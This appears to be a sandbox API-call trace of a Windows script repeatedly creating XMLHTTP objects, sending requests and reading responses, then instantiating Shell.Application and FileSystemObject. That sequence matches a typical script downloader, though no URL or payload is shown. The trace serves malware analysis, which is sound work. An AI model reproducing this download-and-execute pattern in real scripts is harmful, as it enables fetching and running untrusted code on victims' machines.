	[0436.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.680] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0436.680] SysStringLen (param_1=0x0) returned 0x0
	[0436.680] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0436.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0436.680] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0436.680] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0436.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0436.680] ??2@YAPEAX_K@Z () returned 0x62f330
	[0436.680] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0436.680] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0436.680] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0436.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0436.680] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0436.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0436.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.681] longjmp () 
	[0436.681] longjmp () 
	[0436.681] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0436.681] SysStringLen (param_1=0x0) returned 0x0
	[0436.681] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0436.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0436.681] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0436.681] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0436.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0436.682] ??2@YAPEAX_K@Z () returned 0x62f310
	[0436.682] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f310) 
	[0436.682] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0436.682] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0436.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0436.682] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0436.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.682] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0436.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.682] longjmp () 
	[0436.683] longjmp () 
	[0436.683] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0436.683] SysStringLen (param_1=0x0) returned 0x0
	[0436.683] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0436.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0436.683] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0436.683] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0436.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0436.683] ??2@YAPEAX_K@Z () returned 0x62f330
	[0436.683] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0436.683] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0436.683] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0436.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0436.683] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0436.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.684] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0436.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0436.684] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0436.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0436.847] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0436.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0436.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0436.848] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0436.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0436.848] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0436.848] SysStringLen (param_1=0x0) returned 0x0
	[0436.848] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0436.848] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0436.848] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0436.848] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0436.848] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0436.848] ??2@YAPEAX_K@Z () returned 0x62f350
	[0436.848] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0436.848] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0436.848] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0436.848] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0436.848] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0436.849] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0436.849] SysStringLen (param_1=0x0) returned 0x0
	[0436.849] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0436.851] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0436.851] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0436.852] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0436.852] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0436.852] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0436.852] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0437.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0437.559] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0437.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0437.561] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0437.561] SysStringLen (param_1=0x0) returned 0x0
	[0437.561] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0437.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0437.561] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0437.561] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0437.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0437.561] ??2@YAPEAX_K@Z () returned 0x62f330
	[0437.561] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0437.561] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0437.561] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0437.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0437.561] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0437.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
